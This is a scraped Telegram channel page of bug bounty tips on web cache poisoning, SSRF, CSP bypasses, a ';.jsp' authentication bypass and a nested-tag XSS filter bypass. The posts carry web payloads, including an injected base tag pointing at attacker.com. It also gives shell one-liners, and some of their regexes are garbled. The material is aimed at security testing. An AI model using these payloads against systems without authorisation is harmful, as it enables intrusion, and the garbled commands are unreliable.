uz
Feedback
Bug bounty Tips

Bug bounty Tips

Kanalga Telegramโ€™da oโ€˜tish

๐Ÿ›ก๏ธ Cybersecurity enthusiast | ๐Ÿ’ป Helping secure the digital world | ๐ŸŒ Web App Tester | ๐Ÿ•ต๏ธโ€โ™‚๏ธ OSINT Specialist Admin: @laazy_hack3r

Ko'proq ko'rsatish
5 784
Obunachilar
+424 soatlar
+767 kunlar
+40730 kunlar
Postlar arxiv
Web Cache Poisoning smallโœ… checklist Read Full Article : https://medium.com/@Aacle/web-cache-poisoning-part-2-weaponizing-hea
Web Cache Poisoning smallโœ… checklist Read Full Article : https://medium.com/@Aacle/web-cache-poisoning-part-2-weaponizing-headers-url-discrepancies-bbb7b2c0159a โ€ข Test X-Forwarded-*, X-Host, X-Original-URL, User-Agent for reflection. โ€ข Check Vary and target UA-specific poisoning when relevant. โ€ข Try encoded dot-segments (%2e%2e, %2f, %5c) and observe X-Cache โ€ข Test .css / .js extension flip on sensitive endpoints (CSPT) โ€ข Seed cache via Burp parallel requests (first .js then main HTML) โ€ข Use fresh IPs, low request rate, and record X-Cache, Age, CF-Cache-Status โ€ข Run delimiter discovery (append random suffix โ†’ insert delimiter โ†’ compare).

Part - 2 Web Cache Poisoning Quick tip: test X-Forwarded-Host + extension flips (.css/.js) โ€” if the edge caches your reflecte
Part - 2 Web Cache Poisoning Quick tip: test X-Forwarded-Host + extension flips (.css/.js) โ€” if the edge caches your reflected header or JSON as a โ€œstaticโ€ asset, every visitor can get poisoned JS or tokens. Read 5 practical PoCs & seeding recipes โ†’ https://medium.com/@Aacle/web-cache-poisoning-part-2-weaponizing-headers-url-discrepancies-bbb7b2c0159a

๐Ÿ”ฅ SSRF hunters โ€” 3 tiny tricks that turn โ€œmaybeโ€ into provable (one-request) POCs โ€” read the full playbook๐Ÿ‘‡ โ€ข โฑ๏ธ Timing-del
๐Ÿ”ฅ SSRF hunters โ€” 3 tiny tricks that turn โ€œmaybeโ€ into provable (one-request) POCs โ€” read the full playbook๐Ÿ‘‡ โ€ข โฑ๏ธ Timing-delay โ€ข ๐Ÿ” Subdomain-rotation โ€ข ๐Ÿท๏ธ Header-correlation Read the full Medium guide โžก๏ธ https://medium.com/@Aacle/ssrf-part-3-advanced-tricks-timing-channels-out-of-the-box-detection-693c07c97015

Web Cache Poisoning Tips Attacker mindset โ€” donโ€™t bruteforce: look for what the cache keys include. Host headers, cookies, query strings, Accept headers, and odd edge-case headers often end up in the key. Make the app include your input in the key โ†’ you control cached output. Read Full Article : https://medium.com/@Aacle/web-cache-poisoning-part-1-understanding-the-beast-d303f1741e48

First, understand this : Content Security Policy = No XSS It just means "XSS with extra steps" ๐ŸŸฉ : 70% of CSPs I encounter have misconfigurations that make them completely useless. #bugbounty #infosec Here are the ๐Ÿ‘‡ 5 deadly mistakes developers make: ๐— ๐—ถ๐˜€๐˜๐—ฎ๐—ธ๐—ฒ #๐Ÿญ: '๐˜‚๐—ป๐˜€๐—ฎ๐—ณ๐—ฒ-๐—ถ๐—ป๐—น๐—ถ๐—ป๐—ฒ' If you see this in script-src, you've already won. Policy: script-src 'self' 'unsafe-inline' Bypass: <script>alert(1)</script> It literally allows ALL inline scripts. ๐— ๐—ถ๐˜€๐˜๐—ฎ๐—ธ๐—ฒ #๐Ÿฎ: ๐—ช๐—ถ๐—น๐—ฑ๐—ฐ๐—ฎ๐—ฟ๐—ฑ ๐——๐—ผ๐—บ๐—ฎ๐—ถ๐—ป๐˜€ (*.๐—ด๐—ผ๐—ผ๐—ด๐—น๐—ฒ.๐—ฐ๐—ผ๐—บ) "It's Google, what could go wrong?" Everything. This JSONP endpoint on Google works on tons of apps: http:// accounts.google.com/o/oauth2/revoke?callback=alert ๐— ๐—ถ๐˜€๐˜๐—ฎ๐—ธ๐—ฒ #๐Ÿฏ: ๐— ๐—ถ๐˜€๐˜€๐—ถ๐—ป๐—ด ๐—ฏ๐—ฎ๐˜€๐—ฒ-๐˜‚๐—ฟ๐—ถ This is my favorite because it's ALWAYS overlooked. Inject: <base href="https://attacker.com"> Now ALL relative script paths load from your domain. ๐— ๐—ถ๐˜€๐˜๐—ฎ๐—ธ๐—ฒ #๐Ÿฐ: ๐—™๐—ถ๐—น๐—ฒ ๐—จ๐—ฝ๐—น๐—ผ๐—ฎ๐—ฑ๐˜€ ๐—ผ๐—ป ๐—ช๐—ต๐—ถ๐˜๐—ฒ๐—น๐—ถ๐˜€๐˜๐—ฒ๐—ฑ ๐——๐—ผ๐—บ๐—ฎ๐—ถ๐—ป๐˜€ Policy: script-src 'self' http://cdn.example.com If you can upload files to that CDN โ†’ game over. upload a .js file disguised as a profile picture. Direct S3 URL. Loaded as script. ๐— ๐—ถ๐˜€๐˜๐—ฎ๐—ธ๐—ฒ #๐Ÿฑ: ๐—ง๐—ฟ๐˜‚๐˜€๐˜๐—ถ๐—ป๐—ด ๐—–๐——๐—ก๐˜€ ๐˜„๐—ถ๐˜๐—ต ๐—ข๐—น๐—ฑ ๐—Ÿ๐—ถ๐—ฏ๐—ฟ๐—ฎ๐—ฟ๐—ถ๐—ฒ๐˜€ AngularJS versions < 1.6.0 have sandbox escapes. If a whitelisted domain hosts old Angular โ†’ you can execute code. Check http://ajax.googleapis.com for old versions. This works more often than you'd think. ๐—ง๐—ต๐—ถ๐˜€ ๐—ถ๐˜€ ๐—ท๐˜‚๐˜€๐˜ ๐˜๐—ต๐—ฒ ๐—ฏ๐—ฒ๐—ด๐—ถ๐—ป๐—ป๐—ถ๐—ป๐—ด. ๐—ฃ๐—ฎ๐—ฟ๐˜ ๐Ÿฎ: Advanced nonce exploitation, AngularJS escapes, service workers ๐—ฃ๐—ฎ๐—ฟ๐˜ ๐Ÿฏ: DOM clobbering, mutation XSS, scriptless attacks ๐—™๐˜‚๐—น๐—น ๐—ด๐˜‚๐—ถ๐—ฑ๐—ฒ + ๐˜๐—ฒ๐˜€๐˜๐—ถ๐—ป๐—ด ๐—ฐ๐—ต๐—ฒ๐—ฐ๐—ธ๐—น๐—ถ๐˜€๐˜: https://medium.com/@Aacle/a-bug-hunters-guide-to-csp-bypasses-part-1-69b606fd2699

How to Hack JWT using Burp Suite? https://payatu.com/blog/jwt-vulnerabilities/
How to Hack JWT using Burp Suite? https://payatu.com/blog/jwt-vulnerabilities/

This book is for for understanding how API's works and developed

๐Ÿ” *How to Secure Your APIs โ€“ A Practical Guide* APIs are the backbone of modern apps โ€” but without security, they become open doors to attacks. Here's how to lock them down effectively: --- โœ… *1. Use Authentication & Authorization* - Implement *OAuth2*, *JWT*, or *API keys* - Enforce *role-based access control (RBAC)* --- ๐Ÿ” *2. Validate Inputs Strictly* - Sanitize user inputs - Use strong data validation (e.g., Joi, Yup) - Prevent SQL & NoSQL injection --- ๐Ÿ“ฆ *3. Rate Limiting & Throttling* - Control request frequency to avoid abuse - Use tools like *NGINX*, *API Gateway*, or *Cloudflare* --- ๐Ÿ“œ *4. Use HTTPS Everywhere* - Encrypt all data in transit - Never expose APIs over HTTP --- ๐Ÿ•ต๏ธโ€โ™‚๏ธ *5. Monitor & Log* - Track unusual behavior - Use centralized logging (e.g., ELK, Datadog) --- ๐Ÿงฑ *6. CORS & Firewall Rules* - Restrict allowed origins - Protect using *WAFs* and IP whitelisting --- Secure APIs = Safe apps + Protected data + Trusted users Build smart. Build safe.

JSON WEB TOKEN
JSON WEB TOKEN

๐ŸŒA big curated list of awesome resources useful during Penetration testing, Vulnerability assessments, Red/Blue Team operations, Bug Bounty and more๐Ÿง  Online tools for search info about: - exploitโญ๏ธ - vulnerabilitiesโญ๏ธ - peopleโญ๏ธ - emailsโญ๏ธ - phone numbersโญ๏ธ - domainsโญ๏ธ - certificatesโญ๏ธ and moreโค๏ธ. https://github.com/edoardottt/awesome-hacker-search-engines Learn Hacking from Basic to Proโค๏ธ

Web Penetration Testing 2025.pdf3.86 MB

photo content

๐ŸšจCVE-2025-64095 (CVSS 10.0) : A Critical Flaw in DNN Platform Allows Unauthenticated Website Overwrite โšกDorks HUNTER : http:
๐ŸšจCVE-2025-64095 (CVSS 10.0) : A Critical Flaw in DNN Platform Allows Unauthenticated Website Overwrite โšกDorks HUNTER : http://product.name="DotNetNuke"

Hey Hunter's, Darkshadow here back again! โœจAuthentication bypass method: โœ…Steps: 1. Target..com/carbon/server-admin/memory_in
Hey Hunter's, Darkshadow here back again! โœจAuthentication bypass method: โœ…Steps: 1. Target..com/carbon/server-admin/memory_info.jsp = redirect to login page [301 status] 2. Target..com/carbon/server-admin/memory_info.jsp;.jsp = gives the page content without authentication [200 status]
Payload ๐Ÿ‘‰๐Ÿผ ;.jsp
Tip: 1. Find sensitive path from js file which need authentication. 2. Try to find endpoints which end with a extension like: .php, .jsp, .shtml etc. 3. Simply Fuzz every endpoint with the same extension payload like: ;.jsp ;.php ;.shtml If any of these gives 200ok check manually. And might it's works! Don't forget to show your loves guy's โค๏ธ

Extract all endpoints from a JS File and take your bug ๐Ÿž - Method one waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]? 15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '/' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%)" | sed \"s/[;}\)>]/\n/g\" | grep -Po \" (L'1|\"](https?: )?[/1{1,2}[^'||l"> 1{5,3)|(\. (get|post|ajax|load)\s*\(\5*['||\"](https?:)?[/1{1,2}[^'||\"> ] {5,})\"" | awk -F "['|"]" '{print $2}' sort -fu - Method two cat JS.txt | grep -aop "(?<=(\"|\'|' ))\/[a-zA-Z0-9?&=\/-#.](?= (\"||'|'))" | sort -u | tee JS.txt #infosec #cybersec #bugbountytips

Hey Hunters, DarkShadow here back again, dropping an interesting XSS input sanitization bypass method. You might have noticed that most websites currently use input sanitization by blocking certain tags and events, right!? Not really ๐Ÿ˜… Okay, so first, have a look at some example tags that could trigger XSS:
script, img, a, iframe, object, video, audio, form, meta
The website blocks these keywords if they appear inside tags like < > or </ > and replaces them with nothing โ€” basically, null or an empty string "". So, if you try a payload like:
<script>alert(1)</script>
It will be replaced with:
alert(1)
Now, think a bit more deeply โ€” what if you write a payload like this:
<script <img>> alert(1) </script </img>>
In this payload, look at the first part:
<script <img>>
Here, <img> is a full image tag, and it will definitely be removed by the sanitization filter. But what about <script<? You can see the <script> tag isnโ€™t written properly yet โ€” itโ€™s <script followed by <, so it doesnโ€™t match the sanitization logic exactly. Now, the interesting part is when the <img> tag gets removed from <script <img>>. After that, weโ€™re left with <script>! That means the transformation is like this:
<script <img>> โ†’ remove <img> โ†’ <script>
</script </img>> โ†’ remove </img> โ†’ </script>
And finally, we get a valid payload:
<script>alert(1)</script>
So guys, if you really like reading DarkShadowโ€™s methodologies, show your LOVE. And donโ€™t forget to follow me ๐Ÿ‘‰๐Ÿผ x.com/darkshadow2bd #bugbountytips #xss

โ˜„๏ธJSRecon-Buddy - A simple browser extension to quickly find interesting security-related information on a webpage. ๐Ÿ”ดhttps:/
โ˜„๏ธJSRecon-Buddy - A simple browser extension to quickly find interesting security-related information on a webpage. ๐Ÿ”ดhttps://github.com/TheArqsz/JSRecon-Buddy

JSMap Inspector - A powerful, offline, single-file HTML tool designed for developers and security researchers to inspect and
JSMap Inspector - A powerful, offline, single-file HTML tool designed for developers and security researchers to inspect and analyze JavaScript Source Map (.js.map) files. https://github.com/ynsmroztas/JSMap-Inspector

Black Hat USA 2025 Slides and files Conference presentation slides ๐Ÿ”ผGitHub ๐Ÿ”ผInfoCon โค Share & Support & Reaction Us ๐Ÿงฉ #eve
Black Hat USA 2025 Slides and files Conference presentation slides ๐Ÿ”ผGitHub ๐Ÿ”ผInfoCon โค Share & Support & Reaction Us ๐Ÿงฉ #event ๐Ÿ“ฐ @BackupLSO ๐Ÿ“š @LibrarySecOfficial

๐ŸŒ€Download all bug bounty programs domains in scope items ๐ŸŽฏ ๐Ÿ˜‰Get a full list of domains from active bug bounty programs across platforms like HackerOne, Bugcrowd, Intigriti, and more โ€“ all in one place!๐Ÿ’ฅ ๐Ÿ‘‡๐ŸผStep 1: Download the domains.txt file ๐Ÿ“‚step 2: Extract only main/root domains `cat domains.txt | awk -F '.' '{print $(NF-1)"."$NF}' | grep -Eo '([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}' | sort -u > main_domains` ๐Ÿ“‚Step 3: Extract all IP addresses: `grep -Eo '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' domains.txt > ips.txt` Don't forget to give reactionsโค๏ธ